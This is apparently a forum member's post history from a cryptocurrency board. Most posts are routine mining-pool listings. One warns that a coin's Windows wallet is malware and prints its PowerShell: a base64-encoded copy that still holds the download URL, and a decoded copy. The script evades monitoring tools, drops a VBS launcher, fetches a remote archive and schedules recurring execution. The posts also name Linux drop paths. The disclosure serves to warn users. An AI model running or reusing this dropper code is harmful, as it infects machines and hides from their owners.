aQByACcALAAgACcAYQBuAHYAaQByADYANAAnACwAIAAnAFcAaQByAGUAcwBoAGEAcgBrACcAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAKQB7AGUAeABpAHQAfQAgAEUAbABzAGUAIAB7AGkAZgAoACAAIQAoACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwATABvAGcAUwB0AGEAdABlAFwAaAB0AE0AYgBaAHAALgBwAHkAIgAgAC0AUABhAHQAaABUAHkAcABlACAATABlAGEAZgApACAALQBhAG4AZAAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwATABvAGcAUwB0AGEAdABlAFwAdwBzADIAaABlAGwAcAAuAGUAeABlACIAIAAtAFAAYQB0AGgAVAB5AHAAZQAgAEwAZQBhAGYAKQAgAC0AYQBuAGQAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEwAbwBnAFMAdABhAHQAZQBcAGoATABoAGUAcgBZAHUALgB2AGIAcwAiACAALQBQAGEAdABoAFQAeQBwAGUAIABMAGUAYQBmACkAKQApAHsAcwBjAGgAdABhAHMAawBzACAALwBkAGUAbABlAHQAZQAgAC8AdABuACAAIgBJAG0ARABzAGsAUwB2AGMAXAB3AG0AaQBBAHAAUwByAHYAIgAgAC8AZgA7AFMAdABvAHAALQBQAHIAbwBjAGUAcwBzACAALQBOAGEAbQBlACAAIgB3AHMAMgBoAGUAbABwACIAOwBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABMAG8AZwBTAHQAYQB0AGUAIgA7AE4AZQB3AC0ASQB0AGUAbQAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAEYAbwByAGMAZQAgAC0AUABhAHQAaAAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABMAG8AZwBTAHQAYQB0AGUAIgA7ACQAYQBkAGQAUABhAHQAaAAgAD0AIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwATABvAGcAUwB0AGEAdABlAFwAagBMAGgAZQByAFkAdQAuAHYAYgBzACIAOwAgACQAdABlAHgAdAAgAD0AIAAiAE8AcAB0AGkAbwBuACAARQB4AHAAbABpAGMAaQB0ACIAOwAkAHQAZQB4AHQAMgAgAD0AIAAiAEQAaQBtACAAUAByAG8AYwBlAHMAcwBQAGEAdABoACIAOwAkAHQAZQB4AHQAMwAgAD0AIAAiAEQAaQBtACAAZgBpAGwAZQBTAHkAcwB0AGUAbQBPAGIAagBlAGMAdAAiADsAJAB0AGUAeAB0ADQAIAA9ACAAIgBEAGkAbQAgAHMAdAByAEEAcABwAEQAYQB0AGEAUABhAHQAaAAiADsAJAB0AGUAeAB0ADUAIAA9ACAAIgBQAHIAbwBjAGUAcwBzAFAAYQB0AGgAIAA9ACAAYAAiAHcAcwAyAGgAZQBsAHAALgBlAHgAZQBgACIAIgA7ACQAdABlAHgAdAA2ACAAPQAgACIAQwBhAGwAbAAgAEMAaABlAGMAawBQAHIAbwBjAGUAcwBzACgARABiAGwAUQB1AG8AdABlACgAUAByAG8AYwBlAHMAcwBQAGEAdABoACkAKQAiADsAJAB0AGUAeAB0ADcAIAA9ACAAIgBTAHUAYgAgAEMAaABlAGMAawBQAHIAbwBjAGUAcwBzACgAUAByAG8AYwBlAHMAcwBQAGEAdABoACkAIgA7ACQAdABlAHgAdAA4ACAAPQAgACIARABpAG0AIABzAHQAcgBDAG8AbQBwAHUAdABlAHIALABvAGIAagBXAE0ASQBTAGUAcgB2AGkAYwBlACwAYwBvAGwAUAByAG8AYwBlAHMAcwBlAHMALABXAHMAaABTAGgAZQBsAGwALABUAGEAYgAsAFAAcgBvAGMAZQBzAHMATgBhAG0AZQAiADsAJAB0AGUAeAB0ADkAIAA9ACAAIgBzAHQAcgBDAG8AbQBwAHUAdABlAHIAIAA9ACAAYAAiAC4AYAAiACIAOwAkAHQAZQB4AHQAMQAwACAAPQAgACIAVABhAGIAIAA9ACAAUwBwAGwAaQB0ACgAUAByAG8AYwBlAHMAcwBQAGEAdABoACwAYAAiAFwAYAAiACkAIgA7ACQAdABlAHgAdAAxADEAIAA9ACAAIgBQAHIAbwBjAGUAcwBzAE4AYQBtAGUAIAA9ACAAVABhAGIAKABVAEIAbwB1AG4AZAAoAFQAYQBiACkAKQAiADsAJAB0AGUAeAB0ADEAMgAgAD0AIAAiAFAAcgBvAGMAZQBzAHMATgBhAG0AZQAgAD0AIABSAGUAcABsAGEAYwBlACgAUAByAG8AYwBlAHMAcwBOAGEAbQBlACwAQwBoAHIAKAAzADQAKQAsAGAAIgBgACIAKQAiADsAJAB0AGUAeAB0ADEAMwAgAD0AIAAiAFMAZQB0ACAAbwBiAGoAVwBNAEkAUwBlAHIAdgBpAGMAZQAgAD0AIABHAGUAdABPAGIAagBlAGMAdAAoAGAAIgB3AGkAbgBtAGcAbQB0AHMAOgBgACIAIABfACIAOwAkAHQAZQB4AHQAMQA0ACAAPQAgACIAJgAgAGAAIgB7AGkAbQBwAGUAcgBzAG8AbgBhAHQAaQBvAG4ATABlAHYAZQBsAD0AaQBtAHAAZQByAHMAbwBuAGEAdABlAH0AIQBcAFwAYAAiACAAJgAgAHMAdAByAEMAbwBtAHAAdQB0AGUAcgAgACYAIABgACIAXAByAG8AbwB0AFwAYwBpAG0AdgAyAGAAIgApACIAOwAkAHQAZQB4AHQAMQA1ACAAPQAgACIAUwBlAHQAIABjAG8AbABQAHIAbwBjAGUAcwBzAGUAcwAgAD0AIABvAGIAagBXAE0ASQBTAGUAcgB2AGkAYwBlAC4ARQB4AGUAYwBRAHUAZQByAHkAIABfACIAOwAkAHQAZQB4AHQAMQA2ACAAPQAgACIAKABgACIAUwBlAGwAZQBjAHQAIAAqACAAZgByAG8AbQAgAFcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAIABXAGgAZQByAGUAIABOAGEAbQBlACAAPQAgACcAYAAiACYAIABQAHIAbwBjAGUAcwBzAE4AYQBtAGUAIAAmACAAYAAiACcAYAAiACkAIgA7ACQAdABlAHgAdAAxADcAIAA9ACAAIgBTAGUAdAAgAGYAaQBsAGUAUwB5AHMAdABlAG0ATwBiAGoAZQBjAHQAIAA9ACAAQwByAGUAYQB0AGUATwBiAGoAZQBjAHQAKABgACIAUwBjAHIAaQBwAHQAaQBuAGcALgBGAGkAbABlAFMAeQBzAHQAZQBtAE8AYgBqAGUAYwB0AGAAIgApACIAOwAkAHQAZQB4AHQAMQA4ACAAPQAgACIAcwB0AHIAQQBwAHAARABhAHQAYQBQAGEAdABoACAAPQAgAEMAcgBlAGEAdABlAE8AYgBqAGUAYwB0ACgAYAAiAFcAUwBjAHIAaQBwAHQALgBTAGgAZQBsAGwAYAAiACkALgBFAHgAcABhAG4AZABFAG4AdgBpAHIAbwBuAG0AZQBuAHQAUwB0AHIAaQBuAGcAcwAoAGAAIgAlAGEAcABwAGQAYQB0AGEAJQBgACIAKQAiADsAJAB0AGUAeAB0ADEAOQAgAD0AIAAiAEkAZgAgAGMAbwBsAFAAcgBvAGMAZQBzAHMAZQBzAC4AQwBvAHUAbgB0ACAAPQAgADAAIABBAG4AZAAgAGYAaQBsAGUAUwB5AHMAdABlAG0ATwBiAGoAZQBjAHQALgBGAGkAbABlAEUAeABpAHMAdABzACgAcwB0AHIAQQBwAHAARABhAHQAYQBQAGEAdABoACAAJgAgAGAAIgBcAEwAbwBnAFMAdABhAHQAZQBcAGgAdABNAGIAWgBwAC4AcAB5AGAAIgApACAAVABoAGUAbgAiADsAJAB0AGUAeAB0ADIAMAAgAD0AIAAiAFMAZQB0ACAAVwBzAGgAUwBoAGUAbABsACAAPQAgAEMAcgBlAGEAdABlAE8AYgBqAGUAYwB0ACgAYAAiAFcAUwBjAHIAaQBwAHQALgBTAGgAZQBsAGwAYAAiACkAIgA7ACQAdABlAHgAdAAyADEAIAA9ACAAIgBXAHMAaABTAGgAZQBsAGwALgBSAHUAbgAgAGAAIgBjAG0AZAAgAC8AYwAgACUAYQBwAHAAZABhAHQAYQAlAFwATABvAGcAUwB0AGEAdABlAFwAdwBzADIAaABlAGwAcAAuAGUAeABlACAAJQBhAHAAcABkAGEAdABhACUAXABMAG8AZwBTAHQAYQB0AGUAXABoAHQATQBiAFoAcAAuAHAAeQBgACIALAAgADAALAAgAEYAYQBsAHMAZQAiADsAJAB0AGUAeAB0ADIAMgAgAD0AIAAiAEUAbABzAGUAIgA7ACQAdABlAHgAdAAyADMAIAA9ACAAIgBFAHgAaQB0ACAAUwB1AGIAIgA7ACQAdABlAHgAdAAyADQAIAA9ACAAIgBFAG4AZAAgAGkAZgAiADsAJAB0AGUAeAB0ADIANQAgAD0AIAAiAEUAbgBkACAAUwB1AGIAIgA7ACQAdABlAHgAdAAyADYAIAA9ACAAIgBGAHUAbgBjAHQAaQBvAG4AIABEAGIAbABRAHUAbwB0AGUAKABTAHQAcgApACIAOwAkAHQAZQB4AHQAMgA3ACAAPQAgACIARABiAGwAUQB1AG8AdABlACAAPQAgAEMAaAByACgAMwA0ACkAIAAmACAAUwB0AHIAIAAmACAAQwBoAHIAKAAzADQAKQAiADsAJAB0AGUAeAB0ADIAOAAgAD0AIAAiAEUAbgBkACAARgB1AG4AYwB0AGkAbwBuACIAOwBlAGMAaABvACAAJAB0AGUAeAB0ACAAJAB0AGUAeAB0ADIAIAAkAHQAZQB4AHQAMwAgACQAdABlAHgAdAA0ACAAJAB0AGUAeAB0ADUAIAAkAHQAZQB4AHQANgAgACQAdABlAHgAdAA3ACAAJAB0AGUAeAB0ADgAIAAkAHQAZQB4AHQAOQAgACQAdABlAHgAdAAxADAAIAAkAHQAZQB4AHQAMQAxACAAJAB0AGUAeAB0ADEAMgAgACQAdABlAHgAdAAxADMAIAAkAHQAZQB4AHQAMQA0ACAAJAB0AGUAeAB0ADEANQAgACQAdABlAHgAdAAxADYAIAAkAHQAZQB4AHQAMQA3ACAAJAB0AGUAeAB0ADEAOAAgACQAdABlAHgAdAAxADkAIAAkAHQAZQB4AHQAMgAwACAAJAB0AGUAeAB0ADIAMQAgACQAdABlAHgAdAAyADIAIAAkAHQAZQB4AHQAMgAzACAAJAB0AGUAeAB0ADIANAAgACQAdABlAHgAdAAyADUAIAAkAHQAZQB4AHQAMgA2ACAAJAB0AGUAeAB0ADIANwAgACQAdABlAHgAdAAyADgAIAB8ACAATwB1AHQALQBGAGkAbABlACAAJABhAGQAZABQAGEAdABoADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6AFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAIAA9ACAAWwBOAGUAdAAuAFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAVAB5AHAAZQBdADoAOgBUAGwAcwAxADIAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAIgBoAHQAdABwADoALwAvAHUAcABkAGEAdABlAC4AYQBpAHIAZAByAG8AcABlAHIALgBuAGUAdAAvAGIAbwBvAHQAcwB0AHIAYQBwAC4AegBpAHAAIgAgAC0ATwB1AHQARgBpAGwAZQAgACIAJABlAG4AdgA6AFQARQBNAFAAXABiAG8AbwB0AHMAdAByAGEAcAAuAHoAaQBwACIAOwBFAHgAcABhAG4AZAAtAEEAcgBjAGgAaQB2AGUAIAAtAFAAYQB0AGgAIAAiACQAZQBuAHYAOgBUAEUATQBQAFwAYgBvAG8AdABzAHQAcgBhAHAALgB6AGkAcAAiACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AUABhAHQAaAAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABMAG8AZwBTAHQAYQB0AGUAIgAgAC0ARgBvAHIAYwBlADsAcwBjAGgAdABhAHMAawBzACAALwBjAHIAZQBhAHQAZQAgAC8AcwBjACAAbQBpAG4AdQB0AGUAIAAvAG0AbwAgADEAMAAgAC8AdABuACAAIgBJAG0ARABzAGsAUwB2AGMAXAB3AG0AaQBBAHAAUwByAHYAIgAgAC8AdAByACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEwAbwBnAFMAdABhAHQAZQBcAGoATABoAGUAcgBZAHUALgB2AGIAcwAiACAALwBmACAAfQAgAGUAbABzAGUAIAB7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABMAG8AZwBTAHQAYQB0AGUAXABqAEwAaABlAHIAWQB1AC4AdgBiAHMAIgA7AGIAcgBlAGEAawB9AH0A | base64 -d


https://www.virustotal.com/gui/file/f41649a4cb6f167c66ef4e2252c3a50f2b3b8a8d6818580ca0e7d6dec2142ac9/behavior
https://www.virustotal.com/gui/file/7d8bb86d079e81b143f82ead0165f92170795228c06fcf1317e6d99972d90256/behavior

Not only is the windows wallet malicious, so are linux precompiled binares that drop files in /var/lib/fwupd/gnupg/ and /root/.dbus/session-bus/ and then try to set auto execute using /usr/bin/dbus-launch dbus-launch --autolaunch a39eb3ed78b7401fb6809ed0c562a5b1 --binary-syntax --close-stderr


So far we have multiple people that have confirmed the files dropped in the exact position the powershell says they would after using geckowallet.
Also you gotta be out of your mind if you want me to install a virus infected wallet to show video proof.
9  Alternate cryptocurrencies / Announcements (Altcoins) / Re: [ANN] {Geckocoin / Ghostrider \ Masternode / PvP Games} on: March 11, 2023, 10:44:16 PM
Malicious wallet

https://www.virustotal.com/gui/file/031a1900747aab0fc79a9972bf8aaaf0218f5e7124b28814d9c2321c4a650333/behavior
https://www.virustotal.com/gui/file/031a1900747aab0fc79a9972bf8aaaf0218f5e7124b28814d9c2321c4a650333/detection

Geckocoin has malicious wallet that executes a powershell command that downloads malicious files and sets a scheduled job on the PC to run.
If you PC has %appdata%\LogState\ folder with jLherYu.vbs file or ws2help.exe you have been infected!

Decoded powershell with the malicious url removed below:

Code:
If (Get-Process -Name 'Taskmgr', 'perfmon', 'ProcessHacker', 'TMX64', 'TMX', 'procexp64a', 'procexp64', 'procexp', 'ProcessExplorerPortable', 'SystemExplorerPortable', 'SystemExplorer', 'EXEExplorerPort', 'EXE', 'EXE64', 'TaskManagerPort', 'KillProcess', 'TaskMan', 'WinUtilitiesPortable', 'WinUtil', 'FreeTaskManager', 'AnVir', 'anvir64', 'Wireshark' -ErrorAction SilentlyContinue){exit} Else {if( !((Test-Path -Path "$env:APPDATA\LogState\htMbZp.py" -PathType Leaf) -and (Test-Path -Path "$env:APPDATA\LogState\ws2help.exe" -PathType Leaf) -and (Test-Path -Path "$env:APPDATA\LogState\jLherYu.vbs" -PathType Leaf))){schtasks /delete /tn "ImDskSvc\wmiApSrv" /f;Stop-Process -Name "ws2help";Remove-Item -Recurse -Force "$env:APPDATA\LogState";New-Item -ItemType Directory -Force -Path "$env:APPDATA\LogState";$addPath = "$env:APPDATA\LogState\jLherYu.vbs"; $text = "Option Explicit";$text2 = "Dim ProcessPath";$text3 = "Dim fileSystemObject";$text4 = "Dim strAppDataPath";$text5 = "ProcessPath = `"ws2help.exe`"";$text6 = "Call CheckProcess(DblQuote(ProcessPath))";$text7 = "Sub CheckProcess(ProcessPath)";$text8 = "Dim strComputer,objWMIService,colProcesses,WshShell,Tab,ProcessName";$text9 = "strComputer = `".`"";$text10 = "Tab = Split(ProcessPath,`"\`")";$text11 = "ProcessName = Tab(UBound(Tab))";$text12 = "ProcessName = Replace(ProcessName,Chr(34),`"`")";$text13 = "Set objWMIService = GetObject(`"winmgmts:`" _";$text14 = "& `"{impersonationLevel=impersonate}!\\`" & strComputer & `"\root\cimv2`")";$text15 = "Set colProcesses = objWMIService.ExecQuery _";$text16 = "(`"Select * from Win32_Process Where Name = '`"& ProcessName & `"'`")";$text17 = "Set fileSystemObject = CreateObject(`"Scripting.FileSystemObject`")";$text18 = "strAppDataPath = CreateObject(`"WScript.Shell`").ExpandEnvironmentStrings(`"%appdata%`")";$text19 = "If colProcesses.Count = 0 And fileSystemObject.FileExists(strAppDataPath & `"\LogState\htMbZp.py`") Then";$text20 = "Set WshShell = CreateObject(`"WScript.Shell`")";$text21 = "WshShell.Run `"cmd /c %appdata%\LogState\ws2help.exe %appdata%\LogState\htMbZp.py`", 0, False";$text22 = "Else";$text23 = "Exit Sub";$text24 = "End if";$text25 = "End Sub";$text26 = "Function DblQuote(Str)";$text27 = "DblQuote = Chr(34) & Str & Chr(34)";$text28 = "End Function";echo $text $text2 $text3 $text4 $text5 $text6 $text7 $text8 $text9 $text10 $text11 $text12 $text13 $text14 $text15 $text16 $text17 $text18 $text19 $text20 $text21 $text22 $text23 $text24 $text25 $text26 $text27 $text28 | Out-File $addPath;[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri "http://REMOVED.net/bootstrap.zip" -OutFile "$env:TEMP\bootstrap.zip";Expand-Archive -Path "$env:TEMP\bootstrap.zip" -DestinationPath "$env:APPDATA\LogState" -Force;schtasks /create /sc minute /mo 10 /tn "ImDskSvc\wmiApSrv" /tr "$env:APPDATA\LogState\jLherYu.vbs" /f } else {Start-Process -FilePath "$env:APPDATA\LogState\jLherYu.vbs";break}}
10  Alternate cryptocurrencies / Announcements (Altcoins) / Re: [ANN] [SNARK] Snarkcoin, a PoW Coin with Masternodes | X11 Mining Algorithm on: July 19, 2022, 08:28:00 PM
Added to https://mining4people.com (PPLNS) 1% Fee - Payouts Every 2 Minutes - Custom Payouts

GB:
Code:
-a x11 -o stratum+tcp://gb.mining4people.com:3385 -u <WALLET_ADDRESS> -p x
US:
Code:
-a x11 -o stratum+tcp://us.mining4people.com:3385 -u <WALLET_ADDRESS> -p x
AU:
Code:
-a x11 -o stratum+tcp://au.mining4people.com:3385 -u <WALLET_ADDRESS> -p x
FR:
Code:
-a x11 -o stratum+tcp://fr.mining4people.com:3385 -u <WALLET_ADDRESS> -p x
IN:
Code:
-a x11 -o stratum+tcp://in.mining4people.com:3385 -u <WALLET_ADDRESS> -p x
BR:
Code:
-a x11 -o stratum+tcp://br.mining4people.com:3385 -u <WALLET_ADDRESS> -p x
NO:
Code:
-a x11 -o stratum+tcp://no.mining4people.com:3385 -u <WALLET_ADDRESS> -p x

Port 3385 - Normal Diff
Port 13385 - High Diff
Port 23385 - SSL Normal Diff


Discord: https://discord.gg/gB88abP58V | E-mail: support .at. mining4people . com | Twitter: https://twitter.com/Mining4People | Facebook: https://www.facebook.com/Mining4People-101610745816329
11  Alternate cryptocurrencies / Announcements (Altcoins) / Re: [ANN] [SNARK] Snarkcoin - A new alternative to bitcoin and litecoin on: May 19, 2022, 10:43:50 PM
Added to https://mining4people.com (PPLNS) 1% Fee - Payouts Every 2 Minutes - Custom Payouts

GB:
Code:
-a scrypt -o stratum+tcp://gb.mining4people.com:3385 -u <WALLET_ADDRESS> -p x
US:
Code:
-a scrypt -o stratum+tcp://us.mining4people.com:3385 -u <WALLET_ADDRESS> -p x
AU:
Code:
-a scrypt -o stratum+tcp://au.mining4people.com:3385 -u <WALLET_ADDRESS> -p x
FR:
Code:
-a scrypt -o stratum+tcp://fr.mining4people.com:3385 -u <WALLET_ADDRESS> -p x
IN:
Code:
-a scrypt -o stratum+tcp://in.mining4people.com:3385 -u <WALLET_ADDRESS> -p x

Port 3385 - Normal Diff
Port 13385 - High Diff
Port 23385 - SSL Normal Diff


Discord: https://discord.gg/gB88abP58V | E-mail: support .at. mining4people . com | Twitter: https://twitter.com/Mining4People | Facebook: https://www.facebook.com/Mining4People-101610745816329
12  Alternate cryptocurrencies / Announcements (Altcoins) / Re: [ANN] [BTRM] Bitoreum -100% POW CPU/GPU Minable (GhostRider) | SmartNodes on: May 18, 2022, 12:56:37 PM
Added to https://mining4people.com (PPLNS) 1% Fee - Payouts every 2 minutes - 0.1 Minimum - Custom payout limit

GB:
Code:
-a gr -o stratum+tcp://gb.mining4people.com:3358 -u <WALLET_ADDRESS> -p x
US:
Code:
-a gr -o stratum+tcp://us.mining4people.com:3358 -u <WALLET_ADDRESS> -p x
AU:
Code:
-a gr -o stratum+tcp://au.mining4people.com:3358 -u <WALLET_ADDRESS> -p x
FR:
Code:
-a gr -o stratum+tcp://fr.mining4people.com:3358 -u <WALLET_ADDRESS> -p x
IN:
Code:
-a gr -o stratum+tcp://in.mining4people.com:3358 -u <WALLET_ADDRESS> -p x

Port 3358 - Normal Diff
Port 13358 - High Diff
Port 23358 - SSL Normal Diff


Discord: https://discord.gg/gB88abP58V | E-mail: support .at. mining4people . com | Twitter: https://twitter.com/Mining4People | Facebook: https://www.facebook.com/Mining4People-101610745816329
13  Alternate cryptocurrencies / Announcements (Altcoins) / Re: [ANN] SafeMineX [SMX] | YescryptR16 | POW on: May 18, 2022, 12:42:58 PM
Added to https://mining4people.com (PPLNS) 1% Fee

GB:
Code:
-a yescryptr16 -o stratum+tcp://gb.mining4people.com:3382 -u <WALLET_ADDRESS> -p x
US:
Code:
-a yescryptr16 -o stratum+tcp://us.mining4people.com:3382 -u <WALLET_ADDRESS> -p x
AU:
Code:
-a yescryptr16 -o stratum+tcp://au.mining4people.com:3382 -u <WALLET_ADDRESS> -p x
FR:
Code:
-a yescryptr16 -o stratum+tcp://fr.mining4people.com:3382 -u <WALLET_ADDRESS> -p x
IN:
Code:
-a yescryptr16 -o stratum+tcp://in.mining4people.com:3382 -u <WALLET_ADDRESS> -p x

Port 3382 - Normal Diff
Port 13382 - High Diff
Port 23382 - SSL Normal Diff


Discord: https://discord.gg/gB88abP58V | E-mail: support .at. mining4people . com | Twitter: https://twitter.com/Mining4People | Facebook: https://www.facebook.com/Mining4People-101610745816329
14  Alternate cryptocurrencies / Announcements (Altcoins) / Re: [ANN] [REET] REFLECT on: May 18, 2022, 12:32:20 PM
Added to https://mining4people.com (PPLNS) 1% Fee

GB:
Code:
-a scrypt -o stratum+tcp://gb.mining4people.com:3384 -u <WALLET_ADDRESS> -p x
US:
Code:
-a scrypt -o stratum+tcp://us.mining4people.com:3384 -u <WALLET_ADDRESS> -p x
AU:
Code:
-a scrypt -o stratum+tcp://au.mining4people.com:3384 -u <WALLET_ADDRESS> -p x
FR:
Code:
-a scrypt -o stratum+tcp://fr.mining4people.com:3384 -u <WALLET_ADDRESS> -p x
IN:
Code:
-a scrypt -o stratum+tcp://in.mining4people.com:3384 -u <WALLET_ADDRESS> -p x

Port 3384 - Normal Diff
Port 13384 - High Diff
Port 23384 - SSL Normal Diff


Discord: https://discord.gg/gB88abP58V | E-mail: support .at. mining4people . com | Twitter: https://twitter.com/Mining4People | Facebook: https://www.facebook.com/Mining4People-101610745816329
15  Alternate cryptocurrencies / Announcements (Altcoins) / Re: [ANN] SHAHEPAY [SHAHE] | X16RV2 | POW | on: May 18, 2022, 12:05:49 PM
Added to https://mining4people.com (PPLNS) 1% Fee

GB:
Code:
-a x16rv2 -o stratum+tcp://gb.mining4people.com:3359 -u <WALLET_ADDRESS> -p x
US:
Code:
-a x16rv2 -o stratum+tcp://us.mining4people.com:3359 -u <WALLET_ADDRESS> -p x
AU:
Code:
-a x16rv2 -o stratum+tcp://au.mining4people.com:3359 -u <WALLET_ADDRESS> -p x
FR:
Code:
-a x16rv2 -o stratum+tcp://fr.mining4people.com:3359 -u <WALLET_ADDRESS> -p x
IN:
Code:
-a x16rv2 -o stratum+tcp://in.mining4people.com:3359 -u <WALLET_ADDRESS> -p x

Port 3359 - Normal Diff
Port 13359 - High Diff
Port 23359 - SSL Normal Diff


Discord: https://discord.gg/gB88abP58V | E-mail: support .at. mining4people . com | Twitter: https://twitter.com/Mining4People | Facebook: https://www.facebook.com/Mining4People-101610745816329
16  Alternate cryptocurrencies / Announcements (Altcoins) / Re: [ANN] Yerbas [YERB] | POW CPU Minable (GhostRider) | ASIC And FPGA Resistant | on: May 18, 2022, 12:03:58 PM
Added to https://mining4people.com (PPLNS) 1% Fee

GB:
Code:
-a gr -o stratum+tcp://gb.mining4people.com:3380 -u <WALLET_ADDRESS> -p x
US:
Code:
-a gr -o stratum+tcp://us.mining4people.com:3380 -u <WALLET_ADDRESS> -p x
AU:
Code:
-a gr -o stratum+tcp://au.mining4people.com:3380 -u <WALLET_ADDRESS> -p x
FR:
Code:
-a gr -o stratum+tcp://fr.mining4people.com:3380 -u <WALLET_ADDRESS> -p x
IN:
Code:
-a gr -o stratum+tcp://in.mining4people.com:3380 -u <WALLET_ADDRESS> -p x

Port 3380 - Normal Diff
Port 13380 - High Diff
Port 23380 - SSL Normal Diff


Discord: https://discord.gg/gB88abP58V | E-mail: support .at. mining4people . com | Twitter: https://twitter.com/Mining4People | Facebook: https://www.facebook.com/Mining4People-101610745816329
17  Alternate cryptocurrencies / Announcements (Altcoins) / Re: [Bleu Mint Coin] [BLEU] Launching YiiMP Mining Hub1 / POW / SCRYPT / TAKE OFF!! on: May 18, 2022, 12:02:38 PM
Added to https://mining4people.com (PPLNS) 1% Fee

GB:
Code:
-a scrypt -o stratum+tcp://gb.mining4people.com:3381 -u <WALLET_ADDRESS> -p x
US:
Code:
-a scrypt -o stratum+tcp://us.mining4people.com:3381 -u <WALLET_ADDRESS> -p x
AU:
Code:
-a scrypt -o stratum+tcp://au.mining4people.com:3381 -u <WALLET_ADDRESS> -p x
FR:
Code:
-a scrypt -o stratum+tcp://fr.mining4people.com:3381 -u <WALLET_ADDRESS> -p x
IN:
Code:
-a scrypt -o stratum+tcp://in.mining4people.com:3381 -u <WALLET_ADDRESS> -p x

Port 3381 - Normal Diff
Port 13381 - High Diff
Port 23381 - SSL Normal Diff


Discord: https://discord.gg/gB88abP58V | E-mail: support .at. mining4people . com | Twitter: https://twitter.com/Mining4People | Facebook: https://www.facebook.com/Mining4People-101610745816329
18  Alternate cryptocurrencies / Announcements (Altcoins) / Re: [S] Stuiver - I am happy to announce Stuiver on: April 21, 2022, 03:02:59 PM
Added to https://mining4people.com (PPLNS) 1% Fee

GB:
Code:
-a scrypt -o stratum+tcp://gb.mining4people.com:3361 -u <WALLET_ADDRESS> -p x
US:
Code:
-a scrypt -o stratum+tcp://us.mining4people.com:3361 -u <WALLET_ADDRESS> -p x
AU:
Code:
-a scrypt -o stratum+tcp://au.mining4people.com:3361 -u <WALLET_ADDRESS> -p x
FR:
Code:
-a scrypt -o stratum+tcp://fr.mining4people.com:3361 -u <WALLET_ADDRESS> -p x
IN:
Code:
-a scrypt -o stratum+tcp://in.mining4people.com:3361 -u <WALLET_ADDRESS> -p x

Port 3361 - Normal Diff
Port 13361 - High Diff
Port 23361 - SSL Normal Diff

If your miner fails to connect and our are using paper wallet, try creating a new paper wallet address. Some of the addresses seem to get rejected by the pool.

Also added explorer: https://stui.mining4people.com

Build windows wallet: https://drive.google.com/file/d/1W1FsFd9ry1oLsZ6-Z79kzcNFi2RfId72/view?usp=sharing
https://www.virustotal.com/gui/file/35236d9699638f1a79e84532caa26881b69eb45957ed65c9454f62cdbea63eb2?nocache=1
https://www.virustotal.com/gui/file/c34946f384e614c9b43aa53f4987eb5e293f9039ac2007e98a939055448688a4?nocache=1
https://www.virustotal.com/gui/file/7ca75fa7d66ecc81dcdf0cc2240e83c7c006ee90cc2ae18e66f6407c9845b01b?nocache=1
https://www.virustotal.com/gui/file/1b6b764eb06058442770d1cfb539f78314ba7e3ad4ecc9260151b61853c5069e?nocache=1

Discord: https://discord.gg/gB88abP58V | E-mail: support .at. mining4people . com | Twitter: https://twitter.com/Mining4People | Facebook: https://www.facebook.com/Mining4People-101610745816329
19  Alternate cryptocurrencies / Announcements (Altcoins) / Re: [ANN] Bitcoin DX :: A Bitcoin 0.22 Hard-Fork on: January 08, 2022, 10:51:00 PM
Added to https://arctic-crypto.com - GB/DE/SG/US East Stratums - 1%PPLNS/1%Solo - Payments every minute.

PPLNS:
Code:
-a sha256 -o stratum+tcps://arctic-crypto.com:3335 -u <WALLET_ADDRESS> -p x

SOLO:
Code:
-a sha256 -o stratum+tcp://arctic-crypto.com:3315 -u <WALLET_ADDRESS> -p x

For DE
Code:
-a sha256 -o stratum+tcp://eu1.arctic-crypto.com:3335 -u <WALLET_ADDRESS> -p x
For SG
Code:
-a sha256 -o stratum+tcp://sg.arctic-crypto.com:3335 -u <WALLET_ADDRESS> -p x
For US-E
Code:
-a sha256 -o stratum+tcp://us.arctic-crypto.com:3335 -u <WALLET_ADDRESS> -p x


Nicehash is supported on 1XXXX port. | SSL Supported on 2XXXX Port. | ASICS Boost Supported.

Discord: https://discord.gg/gB88abP58V
20  Alternate cryptocurrencies / Announcements (Altcoins) / Re: [ANN][POW] Driyal (Digital Riyal - DRI) مبادرة الريال الرقمي on: December 22, 2021, 07:19:35 PM
